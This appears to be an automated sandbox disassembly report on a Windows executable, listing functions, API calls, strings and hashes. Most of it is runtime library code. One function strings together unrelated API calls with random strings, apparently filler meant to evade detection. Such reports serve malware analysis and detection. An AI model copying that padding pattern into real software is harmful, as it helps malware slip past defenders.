                                                                                            • Opcode ID: 71b3f7c736db1d8a25b4634da0866dada4237699df8c9a9462adb1db74f73e14
                                                                                            • Instruction ID: ed7bc841d4d9f1d649225696c3d2226f5790fb8edf26953cf78d1b09409c4fbc
                                                                                            • Opcode Fuzzy Hash: 71b3f7c736db1d8a25b4634da0866dada4237699df8c9a9462adb1db74f73e14
                                                                                            • Instruction Fuzzy Hash: A041AC35A48314ABF720ABA1EC46B9A7770FB45B15F104439E705BB6E0CBF42811CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004013BF
                                                                                            • CreateJobObjectW.KERNEL32(00000000,zamuloguwatisofobus), ref: 004013C8
                                                                                            • GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 004013D3
                                                                                            • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004013DF
                                                                                            • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004013F5
                                                                                            • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 004013FF
                                                                                            • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 00401409
                                                                                            • GetTimeFormatA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040141B
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00401427
                                                                                            • TlsSetValue.KERNEL32(00000000,00000000), ref: 0040142D
                                                                                            • SetVolumeMountPointW.KERNEL32(00000000,?), ref: 0040143C
                                                                                            • GetEnvironmentVariableA.KERNEL32(00000000,?,00000000), ref: 0040144D
                                                                                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep), ref: 0040145E
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040146F
                                                                                            Strings
                                                                                            • zamuloguwatisofobus, xrefs: 004013C1
                                                                                            • gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep, xrefs: 00401453
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileName$CreateFormatModule$AliasCalendarConsoleDateEnumEnvironmentExesFormatsInfoMountNamedNumberObjectParametersPipePointProcessShortShutdownTimeValueVariableVolume
                                                                                            • String ID: gotarurivocabowixetalakagaxahufijefisosefimazuwuhituwigoveyehucorocoyepep$zamuloguwatisofobus
                                                                                            • API String ID: 3743761972-355902816
                                                                                            • Opcode ID: 5627bd046ae1666cfd36e497ead6cc165f59d63a3a085b41ff9b56f1d257c26b
                                                                                            • Instruction ID: ee725c894420173f20a28521c692df52ac170885327d7458979d19a182ce65e7
                                                                                            • Opcode Fuzzy Hash: 5627bd046ae1666cfd36e497ead6cc165f59d63a3a085b41ff9b56f1d257c26b
                                                                                            • Instruction Fuzzy Hash: 8C317F76784314BBF7509BA2DD8AF997764EB08B02F104465F708BA1D0CAF06950CB7D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 229 4033d0-4033f8 DecodePointer * 2 230 4033fe-403408 229->230 231 40347f 229->231 230->231 232 40340a-403418 call 4050a9 230->232 233 403481-403485 231->233 236 403462-40347d EncodePointer * 2 232->236 237 40341a-403421 232->237 236->233 238 403423 237->238 239 403425-403429 237->239 238->239 240 40343a-40343f 239->240 241 40342b-40342c 239->241 240->231 243 403441-403442 240->243 242 40342f call 404556 241->242 244 403434-403438 242->244 245 403445 call 404556 243->245 244->240 246 403450-40345d EncodePointer 244->246 247 40344a-40344e 245->247 246->236 247->231 247->246
                                                                                            APIs
                                                                                            • DecodePointer.KERNEL32(00443E2C,0040E290,?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 004033E5
                                                                                            • DecodePointer.KERNEL32(?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 004033F2
                                                                                            • __realloc_crt.LIBCMT ref: 0040342F
                                                                                            • __realloc_crt.LIBCMT ref: 00403445
                                                                                            • EncodePointer.KERNEL32(00000000,?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 00403457
                                                                                            • EncodePointer.KERNEL32(?,?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 0040346B
                                                                                            • EncodePointer.KERNEL32(-00000004,?,?,?,004034D4,?,0043C1B8,0000000C,00403500,?,?,0040399C,0040D8D9,?), ref: 00403473
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                            • String ID:
                                                                                            • API String ID: 4108716018-0
                                                                                            • Opcode ID: 89fe0d1d2ceca4ac7e35c5f64854b923209340b4f03b29cb2949e359ddeeabe9
                                                                                            • Instruction ID: 2cb84a8a248f1c704ed31b969d410d2ae143d87c3ddf2eb88c20de984f4c0adb
                                                                                            • Opcode Fuzzy Hash: 89fe0d1d2ceca4ac7e35c5f64854b923209340b4f03b29cb2949e359ddeeabe9
                                                                                            • Instruction Fuzzy Hash: 2711E972600215AFDB01AF76ED8085A7BEDFB51321310443BE945FB290EB75EE448B9C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 248 404074-404086 call 405c14 251 404088-40408d 248->251 252 40408f-404098 248->252 253 4040b1-4040b4 251->253 254 4040b5-4040cd call 40404c call 4048fa 252->254 255 40409a-4040a9 call 40450a 252->255 264 4040d3 254->264 265 4040cf-4040d1 254->265 255->254 261 4040ab 255->261 263 4040b0 261->263 263->253 266 4040d8 call 404843 264->266 265->263 267 4040dd 266->267
                                                                                            APIs
                                                                                            • __getptd_noexit.LIBCMT ref: 0040407B
                                                                                              • Part of subcall function 00405C14: GetLastError.KERNEL32(?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C18
                                                                                              • Part of subcall function 00405C14: ___set_flsgetvalue.LIBCMT ref: 00405C26
                                                                                              • Part of subcall function 00405C14: __calloc_crt.LIBCMT ref: 00405C3A
                                                                                              • Part of subcall function 00405C14: DecodePointer.KERNEL32(00000000,?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C54
                                                                                              • Part of subcall function 00405C14: __initptd.LIBCMT ref: 00405C63
                                                                                              • Part of subcall function 00405C14: GetCurrentThreadId.KERNEL32 ref: 00405C6A
                                                                                              • Part of subcall function 00405C14: SetLastError.KERNEL32(00000000,?,?,004048EC,004031F3,?,?,00402C76,?,?,00401021), ref: 00405C82
                                                                                            • __calloc_crt.LIBCMT ref: 0040409D
                                                                                            • __get_sys_err_msg.LIBCMT ref: 004040BB
                                                                                            • _strcpy_s.LIBCMT ref: 004040C3
                                                                                            • __invoke_watson.LIBCMT ref: 004040D8
                                                                                            Strings
                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00404088, 004040AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                            • API String ID: 69636372-798102604
                                                                                            • Opcode ID: f8c1622f847cd41dc825cc8429334fb613d8da8a375c82c01b0cad83c0a18197
                                                                                            • Instruction ID: 37372fcaa6264d988ca6bfe18943687c80e0c4479773ad4bbbf24e5db921d2ee
                                                                                            • Opcode Fuzzy Hash: f8c1622f847cd41dc825cc8429334fb613d8da8a375c82c01b0cad83c0a18197
                                                                                            • Instruction Fuzzy Hash: 29F0F0F260431067EA34392A5C8192B768CCBC0728B10483FFF09B72C2E93E9C4041EE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 268 406ba3-406bb4 269 406bd5-406be1 call 405c8d 268->269 270 406bb6-406bbb 268->270 274 406bee-406bf1 269->274 277 406be3-406be8 call 405c8d 269->277 270->269 271 406bbd-406bc2 270->271 273 406bc4-406bc9 call 405c8d 271->273 271->274 273->269 277->274
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 00406BC4
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __getptd.LIBCMT ref: 00406BD5
                                                                                            • __getptd.LIBCMT ref: 00406BE3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: MOC$RCC$csm
                                                                                            • API String ID: 803148776-2671469338
                                                                                            • Opcode ID: 8ecf2eeeed4e20ee07344ffd1711ce4d4eff133d1e30a160131708de42a51081
                                                                                            • Instruction ID: 8a2cd633cb2861bc694519b041e08bbf0c3c08e2df89b1e629200bcacebe9179
                                                                                            • Opcode Fuzzy Hash: 8ecf2eeeed4e20ee07344ffd1711ce4d4eff133d1e30a160131708de42a51081
                                                                                            • Instruction Fuzzy Hash: 8EE0E5711046149ED7209B65804576637A4EB48314F1640B7981EDF292E73CE8608E46

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __CreateFrameInfo.LIBCMT ref: 00406E7D
                                                                                              • Part of subcall function 00403EBB: __getptd.LIBCMT ref: 00403EC9
                                                                                              • Part of subcall function 00403EBB: __getptd.LIBCMT ref: 00403ED7
                                                                                            • __getptd.LIBCMT ref: 00406E87
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __getptd.LIBCMT ref: 00406E95
                                                                                            • __getptd.LIBCMT ref: 00406EA3
                                                                                            • __getptd.LIBCMT ref: 00406EAE
                                                                                            • _CallCatchBlock2.LIBCMT ref: 00406ED4
                                                                                              • Part of subcall function 00403F60: __CallSettingFrame@12.LIBCMT ref: 00403FAC
                                                                                              • Part of subcall function 00406F7B: __getptd.LIBCMT ref: 00406F8A
                                                                                              • Part of subcall function 00406F7B: __getptd.LIBCMT ref: 00406F98
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 1602911419-0
                                                                                            • Opcode ID: d333959b915fd8e1c0de2bbeecd09f1762429139ffca88642f3ae91fcbc7b69d
                                                                                            • Instruction ID: f4ff0da73481029c5499c7a5202893000d10d4cc2dbb847b80b5ec56fdd99133
                                                                                            • Opcode Fuzzy Hash: d333959b915fd8e1c0de2bbeecd09f1762429139ffca88642f3ae91fcbc7b69d
                                                                                            • Instruction Fuzzy Hash: 5111DA71C04709DFEB00EFA5D445BAE7BB0FF08315F10806AF815A7291DB789A159F54

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 301 408388-4083a3 call 4050e0 call 405c8d 306 4083c2-4083da call 4057f2 301->306 307 4083a5-4083a9 301->307 312 408412-40841e call 408423 306->312 313 4083dc-4083de 306->313 307->306 309 4083ab 307->309 311 4083ae-4083b0 309->311 314 4083b2-4083b9 call 40391a 311->314 315 4083ba-4083c1 call 405125 311->315 312->311 316 4083e0-4083e9 InterlockedDecrement 313->316 317 4083fa-40840c InterlockedIncrement 313->317 314->315 316->317 322 4083eb-4083f1 316->322 317->312 322->317 325 4083f3-4083f9 call 4031cd 322->325 325->317
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 00408394
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __amsg_exit.LIBCMT ref: 004083B4
                                                                                            • __lock.LIBCMT ref: 004083C4
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004083E1
                                                                                            • _free.LIBCMT ref: 004083F4
                                                                                            • InterlockedIncrement.KERNEL32(02182B00), ref: 0040840C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                            • String ID:
                                                                                            • API String ID: 3470314060-0
                                                                                            • Opcode ID: 9c95964594f11b1e78af7126a55ab338d3c48414ecb463209b489f9f02392a2e
                                                                                            • Instruction ID: be03bcebc997c338deb4113661e8592eb7893f85a970011884610e18a9bd654e
                                                                                            • Opcode Fuzzy Hash: 9c95964594f11b1e78af7126a55ab338d3c48414ecb463209b489f9f02392a2e
                                                                                            • Instruction Fuzzy Hash: D701ED31A01A22DBC720AF26990635E7360FB84B14F00003FE854B72D2CF7D59009BDE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 328 402160-402173 329 402175-40217a call 4026b3 328->329 330 40217f-402186 328->330 329->330 332 402188 330->332 333 40218a-40218c 330->333 332->333 334 4021ad-4021b0 333->334 335 40218e-4021aa call 402250 * 2 333->335 337 4021b2-4021b7 call 402666 334->337 338 4021bc-4021c1 334->338 337->338 339 4021c3-4021d4 call 4022e0 338->339 340 4021eb-4021ed 338->340 344 4021d6-4021de 339->344 353 40223e-402244 339->353 340->344 345 4021ef-4021f5 340->345 348 4021e0 344->348 349 4021e2-4021e5 344->349 350 402205-40220e 345->350 351 4021f7-402202 345->351 348->349 354 402211 349->354 355 4021e7-4021e9 349->355 356 402213-402227 call 402870 354->356 355->356 359 402238-40223a 356->359 360 402229-402235 356->360 359->353
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040217A
                                                                                              • Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026C8
                                                                                              • Part of subcall function 004026B3: __CxxThrowException@8.LIBCMT ref: 004026DD
                                                                                              • Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026EE
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004021B7
                                                                                              • Part of subcall function 00402666: std::exception::exception.LIBCMT ref: 0040267B
                                                                                              • Part of subcall function 00402666: __CxxThrowException@8.LIBCMT ref: 00402690
                                                                                              • Part of subcall function 00402666: std::exception::exception.LIBCMT ref: 004026A1
                                                                                            • _memmove.LIBCMT ref: 00402218
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                            • String ID: invalid string position$string too long
                                                                                            • API String ID: 1615890066-4289949731
                                                                                            • Opcode ID: 567644979d843288a1ca0f560bd2eb7615e20529f5f63bcf18b1406d7c0d9c96
                                                                                            • Instruction ID: b726f4158dc92675a86be445a4642430293383e093db2d13567e6ff6a983de5c
                                                                                            • Opcode Fuzzy Hash: 567644979d843288a1ca0f560bd2eb7615e20529f5f63bcf18b1406d7c0d9c96
                                                                                            • Instruction Fuzzy Hash: 7F31B6323002149BD7219A9CEE84B5AF3A9EBA1764F20057FF541EB3C1D6F59D4183A9
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBCMT ref: 00407215
                                                                                              • Part of subcall function 00407170: ___BuildCatchObjectHelper.LIBCMT ref: 004071A6
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0040722C
                                                                                            • ___FrameUnwindToState.LIBCMT ref: 0040723A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 2163707966-3733052814
                                                                                            • Opcode ID: 429dfd9f1cdae758d526fcbba669eded09446f82c318ba394456cffaf76e7554
                                                                                            • Instruction ID: 9d33cda1630c614c6b8baaf9185435334ebf2647e1999c875cfe5a2f0f929500
                                                                                            • Opcode Fuzzy Hash: 429dfd9f1cdae758d526fcbba669eded09446f82c318ba394456cffaf76e7554
                                                                                            • Instruction Fuzzy Hash: EC014F35404109BBDF126F51CC45E9B3F6AFF08344F10402AFD18251A1D739E9B1DBA5
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 00403952
                                                                                              • Part of subcall function 004040DE: __FF_MSGBANNER.LIBCMT ref: 004040F7
                                                                                              • Part of subcall function 004040DE: __NMSG_WRITE.LIBCMT ref: 004040FE
                                                                                              • Part of subcall function 004040DE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004044D6,00000000,00000001,00000000,?,0040577D,00000018,0043C238,0000000C,0040580D), ref: 00404123
                                                                                            • std::exception::exception.LIBCMT ref: 00403987
                                                                                            • std::exception::exception.LIBCMT ref: 004039A1
                                                                                            • __CxxThrowException@8.LIBCMT ref: 004039B2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                            • String ID: ,>D
                                                                                            • API String ID: 1414122017-4267898978
                                                                                            • Opcode ID: c563713c882f5ce4ac6a8fb971809998b5ed84bb97ba5090a5cd601f70179b06
                                                                                            • Instruction ID: d5265356af2bd35e749b9d337d3430b3e9a834ab04ff5656c26778cf4cf9b054
                                                                                            • Opcode Fuzzy Hash: c563713c882f5ce4ac6a8fb971809998b5ed84bb97ba5090a5cd601f70179b06
                                                                                            • Instruction Fuzzy Hash: ECF0D675800109AACB00FF56DC46A5D7FA96B41B29B24443FF405B61D1CBF89B46974C
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 0040355D
                                                                                              • Part of subcall function 004040DE: __FF_MSGBANNER.LIBCMT ref: 004040F7
                                                                                              • Part of subcall function 004040DE: __NMSG_WRITE.LIBCMT ref: 004040FE
                                                                                              • Part of subcall function 004040DE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004044D6,00000000,00000001,00000000,?,0040577D,00000018,0043C238,0000000C,0040580D), ref: 00404123
                                                                                            • _free.LIBCMT ref: 00403570
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap_free_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 2734353464-0
                                                                                            • Opcode ID: d1e8b3204e4a6df3a67db14c6d8cd5732c45cf5bda7c9f858878bec0112749d3
                                                                                            • Instruction ID: dc83b90e6fb43b5c24848a5f74a511594923413cb778fb3891e3a705d38e000c
                                                                                            • Opcode Fuzzy Hash: d1e8b3204e4a6df3a67db14c6d8cd5732c45cf5bda7c9f858878bec0112749d3
                                                                                            • Instruction Fuzzy Hash: E511C876810515BBCB213F76AC04A5A3F9C9F807A6B20483BF549BA2E0DA7C8B51D65C
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 004080F8
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __getptd.LIBCMT ref: 0040810F
                                                                                            • __amsg_exit.LIBCMT ref: 0040811D
                                                                                            • __lock.LIBCMT ref: 0040812D
                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00408141
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
